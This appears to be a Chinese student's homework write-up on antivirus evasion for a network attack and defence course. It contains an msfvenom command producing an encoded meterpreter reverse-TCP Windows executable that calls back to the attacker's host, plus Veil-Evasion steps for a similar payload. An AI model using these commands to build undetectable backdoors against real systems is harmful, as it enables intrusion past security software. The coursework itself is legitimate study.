2017-2018-2 20179215《網絡攻防實踐》第十二週做業

2017-2018-2 20179215 《網絡攻防實踐》 第十二週做業 免殺技術

1、實驗內容

（1）理解免殺技術原理

（2）正確使用msf編碼器，veil-evasion，本身利用shellcode編程等免殺工具或技巧；

（3）經過組合應用各類技術實現惡意代碼免殺

（4）用另外一電腦實測，在殺軟開啓的狀況下，可運行並回連成功，註明電腦的殺軟名稱與版本

1.基礎問題回答

（1）殺軟是如何檢測出惡意代碼的？

• 正常行爲分析法：正常行爲分析常被應用於異常檢測之中，是指對程序的正常行爲輪廓進行分析和表示，爲程序創建一個安全行爲庫，當被監測程序的實際行爲與其安全行爲庫中的正常行爲不一致或存在必定差別時，則可能爲惡意代碼

• 特徵檢測法：系統分析獲取惡意代碼一般具備明顯特徵碼，當檢測到代碼含有特徵碼則可能爲惡意代碼

（2）免殺是作什麼？

免殺是不會被殺毒軟件軟件殺掉的病毒或木馬 是病毒的製做人 爲了避免讓病毒被識別出來 經過鑽殺毒軟件漏洞或者將病毒假裝成正常程序的辦法 來逃避殺毒軟件的查殺。

（3）免殺的基本方法有哪些？

• 修改特徵碼：對惡意代碼的特徵碼進行修改，好比添加一些指令，讓殺軟沒法識別其是否爲惡意代碼

• 加花：經過添加加花指令（一些垃圾指令，相似加1減1之類的無用語句）讓殺毒軟件檢測不到特徵碼。加花能夠分爲加區加花和去頭加花

• 加殼：給原程序加上一段保護程序，有保護和加密功能，運行加殼後的文件先運行殼再運行真實文件，從而起到保護做用

2、實驗過程

正確使用msf編碼器，msfvenom生成如jar之類的其餘文件，veil-evasion，本身利用shellcode編程等免殺工具或技巧。將文件傳至http://www.virscan.org/進行檢測

1.msf用編碼器生成執行文件

（1）Kali輸入命令

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=kali的IP LPORT=5324端口號 -f exe >本身起後門名字.exe

（2）將該程序上傳到virscan掃描

文件信息：

掃描結果：

2.用Veil-Evasion生成可執行文件

（1）在Kali中安裝veil，sudo apt-get install veil

（2）在Kali的終端中啓動Veil-Evasion

命令行中輸入veil，後在veil中輸入命令use evasion

依次輸入以下命令生成你的可執行文件：

use python/meterpreter/rev_tcp.py（設置payload）

set LHOST Kali的IP（設置反彈鏈接IP）

set LPORT 端口號（設置反彈端口）

generate 可執行文件名

（輸出有錯誤！）

3.利用shellcode編程實現免殺

• 首先，在Kali上使用命令生成一個c語言格式的Shellcode數組。

• 編譯運行產生a.out文件

• 掃描文件